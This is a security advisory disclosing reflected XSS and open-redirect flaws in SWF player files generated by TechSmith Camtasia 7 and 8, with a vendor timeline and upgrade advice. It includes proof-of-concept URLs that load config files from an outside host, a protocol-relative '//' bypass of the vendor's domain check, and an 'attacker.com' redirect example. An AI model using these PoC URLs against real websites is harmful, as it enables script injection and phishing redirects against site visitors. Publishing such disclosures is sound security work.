Title: Reflected XSS in Flash files of TechSmith Camtasia 8 & 7
Author: Soroush Dalili (@irsdl)
Affected Software: TechSmith Camtasia v8.4.4 (latest 8.x) & v7.1.1 (latest
7.x)
Vendor URL: http://www.techsmith.com/camtasia-version-history.html
Vendor Status: vulnerable
CVE-ID: -
Camtasia 8 (v8.4.4 (latest 8.x) - vulnerable):
==============================================
TechSmith Camtasia is a screen recorder and video editor. After version 8,
it does not create SWF files that contain the video file. Instead, it
creates a MP4 file with HTML5 and SWF players.
However, SWF Player in version 8.4.3 (latest version at the time of
testing) was vulnerable to a reflected XSS attack.
After producing a Flash/HTML5 output, Camtasia creates the following flash
file:
ProjectName_controller.swf
This file is vulnerable to Open Redirect and XSS by loading a config file
that redirects the browser to an arbitrary destination after playing a
video. The destination URL can be attacker's URL (such as "//attacker.com/")
or a JavaScript that uses "javascript:" protocol.
The following shows a PoC code:
ProjectName_controller.swf?src=http://0me.me/demo/camtasia
/small.mp4&xmp=//0me.me/demo/camtasia/camtasia_v8.xml
This file can be found in any website that uses Camtasia projects for
instance techsmith.com website:
http://www.techsmith.com/includes/tsc_player.swf
Camtasia 7 (v7.1.1 (latest 7.x) - vulnerable):
==============================================
An XSS issue was resolved previously in generated Flash files of Camtasia 7
(http://web.appsec.ws/FlashExploitDatabase.php). TechSmith had patched this
vulnerability by implementing the "safeDomainCheck" function that checks
whether the domain is allowed or not in order to load the config file.
However, this protection can be bypassed by using "//" instead of "http://"
or "https://".
PoC code is as follows:
ProjectName_controller.swf?csConfigFile=//0me.me/demo/camtasia
/camtasia_v7.xml&.swf
Solution:
=========
Upgrade from Camtasia version 7 to 8. Use Camtasia HTML5 player instead of
the Flash player in Camtasia v8 and remove the old Flash files from
affected websites.
Disclosure Timeline:
====================
04-Nov-2014 ? discovered
11-Nov-2014 ? reported
14-Nov-2014 ? initial acknowledge of receiving the issue from the vendor
17-Nov-2014 ? the vendor confirmed that they know about these issues and
they do not have any ETA to patch the issue
18-Nov-2014 - the vendor confirmed that this issue can be publicly disclosed
07-Jan-2014 - the vendor also confirmed that this issue can be reported to
the security mail lists (double confirmation)!
Credit:
=======
Vulnerability found by Soroush Dalili (@irsdl)